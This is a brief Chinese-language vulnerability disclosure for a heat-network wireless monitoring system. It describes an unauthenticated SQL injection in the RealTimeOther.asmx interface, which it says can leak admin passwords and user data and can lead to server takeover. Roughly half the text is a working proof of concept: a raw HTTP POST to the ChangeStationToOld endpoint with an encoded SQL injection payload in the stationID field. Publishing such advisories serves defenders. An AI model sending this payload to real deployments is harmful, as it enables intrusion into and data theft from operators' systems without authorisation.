漏洞描述
热网无线监测系统 RealTimeOther.asmx 接口处存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
热网无线监测系统 RealTimeOther.asmx 存在SQL注入漏洞
PoC代码
POST /DataSrvs/RealTimeOther.asmx/ChangeStationToOld HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
stationID=%28SELECT+CHAR%28113%29%2BCHAR%28106%29%2BCHAR%28112%29%2BCHAR%28120%29%2BCHAR%28113%29%2B%28CASE+WHEN+%289253%3D9253%29+THEN+CHAR%2849%29+ELSE+CHAR%2848%29+END%29%2BCHAR%28113%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28106%29%2BCHAR%28113%29%29